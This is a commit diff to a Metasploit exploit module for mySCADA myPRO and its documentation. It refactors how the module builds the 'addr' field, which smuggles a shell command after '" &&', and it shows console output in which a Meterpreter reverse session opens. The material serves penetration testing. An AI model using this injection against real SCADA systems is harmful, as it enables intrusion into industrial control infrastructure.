File tree Expand file tree Collapse file tree 2 files changed +2
-8
lines changed
documentation/modules/exploit/windows/scada
modules/exploits/windows/scada Expand file tree Collapse file tree 2 files changed +2
-8
lines changed Original file line number Diff line number Diff line change @@ -63,7 +63,6 @@ msf6 exploit(windows/scada/mypro_cmdexe) > exploit
6363[*] Checking credentials...
6464[+] Credentials are working.
6565[*] Sending command injection...
66- [*] Using randomly generated email address: [email protected] 6766[*] Sending stage (201798 bytes) to 192.168.1.239
6867[*] Meterpreter session 12 opened (192.168.1.241:4444 -> 192.168.1.239:57382) at 2024-07-23 23:38:12 -0400
6968[*] Exploit finished, check thy shell.
Original file line number Diff line number Diff line change @@ -37,7 +37,7 @@ def initialize(info = {})
3737 'Notes' => {
3838 'Stability' => [ CRASH_SAFE ] ,
3939 'Reliability' => [ REPEATABLE_SESSION ] ,
40- 'SideEffects' => [ ARTIFACTS_ON_DISK , IOC_IN_LOGS ]
40+ 'SideEffects' => [ IOC_IN_LOGS ]
4141 }
4242 )
4343 )
@@ -130,14 +130,9 @@ def check_auth
130130
131131 # Send command injection
132132 def exec_mypro ( cmd )
133- # Generating a random email address
134- addr = "#{ Rex ::Text . rand_text_alphanumeric ( 3 ..12 ) } #{ Rex ::Text . rand_text_alphanumeric ( 4 ..8 ) }
135-
136- print_status ( "Using randomly generated email address: #{ addr } )
137-
138133 post_data = {
139134 'type' => 'sendEmail' ,
140- 'addr' => "addr \" &&#{ cmd }
135+ 'addr' => "#{ Rex :: Text . rand_text_alphanumeric ( 3 .. 12 ) } @ #{ Rex :: Text . rand_text_alphanumeric ( 4 .. 8 ) } .com \" &&#{ cmd }
141136 }
142137 post_json = JSON . generate ( post_data )
143138
You can’t perform that action at this time.
0 commit comments